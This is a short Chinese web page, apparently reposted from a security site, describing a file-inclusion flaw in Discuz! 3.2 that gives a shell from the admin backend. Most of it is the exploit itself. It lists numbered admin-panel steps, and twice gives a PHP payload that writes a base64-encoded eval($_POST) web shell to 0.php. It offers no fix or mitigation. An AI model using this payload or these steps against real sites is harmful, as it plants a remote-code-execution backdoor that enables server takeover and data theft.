好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

Discuz3.2漏洞文件包含漏洞可后台拿shell - 网站安全

由于创建专题时未对

静态化名称 做任何限制引发此 漏洞 1.全局->站点信息

网站 URL:

http://www.comsenz.com/#<?php file_put_contents('0.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUW2FdKTsgPz4='));?>

 

 

2.工具->更新缓存

3.门户->HTML管理 静态文件扩展名: htm 专题HTML存放目录:data/cache

4.创建专题 静态化名称[此处未做任何限制]:template/default/portal/portal_topic_test

 

5.专题管理 对刚添加的专题 开启 并生成

 

6.再次创建专题 模板名 选择刚生成的 ./template/default/portal/portal_topic_test.htm 提交

就执行了php代码

 <?php file_put_contents('0.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUW2FdKTsgPz4='));?>

 

不仅仅是可以生成到专题目录,可以生成到任何可以包含的下面!

 

 

查看更多关于Discuz3.2漏洞文件包含漏洞可后台拿shell - 网站安全的详细内容...

  阅读:85次